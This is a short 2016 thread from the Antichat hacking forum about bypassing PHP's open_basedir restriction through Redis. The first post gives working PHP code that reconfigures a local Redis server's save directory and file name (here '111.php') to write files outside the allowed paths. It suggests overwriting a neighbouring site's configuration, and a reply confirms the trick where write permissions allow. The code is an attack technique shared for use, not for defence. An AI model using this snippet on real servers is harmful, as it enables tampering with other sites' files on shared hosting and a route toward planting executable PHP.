ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   open_basedir (https://forum.antichat.xyz/showthread.php?t=439948)

t0ma5 14.04.2016 21:23
просто размышления

вспомнилась относительно свежая новость

http://antirez.com/news/96

про запись файлов через redis

попробовал применить для обхода open_basedir, хм получилось, правда файл создался из под юзера redis + права по дефолту навесились 600, апач к нему не достучится, да и профит пока хз какой, хотя может быть в каких то случаях можно переписать конфиг соседнего сайта например(redis похоже пофиг что перезаписывать, лишь бы прав хватало на запись)

redis скомпилен модулем к апачу(Redis Version 2.2.4)

пример кода

.SpoilerTarget" type="button">Spoiler

Код:
$redis = new Redis();

$redis->connect('127.0.0.1', 6379);
$redis->set('key', 'value');

$redis->config("SET", "dir", "[путь_до_диры]");  /// должны быть как миниму права на запись на уровне файловой системы с учетом юзера из под которого крутится редис
$redis->config("SET", "dbfilename", "111.php");
$redis->bgSave();
$redis->save();
----------------

точнее не как модуль, а апач скомпилен с флагом --enable-redis ну и pecl там для редиса лежит

faza02 15.04.2016 01:44
вроде уже год как пофикшено, но это тру, если прав хватает на перезапись


Время: 11:34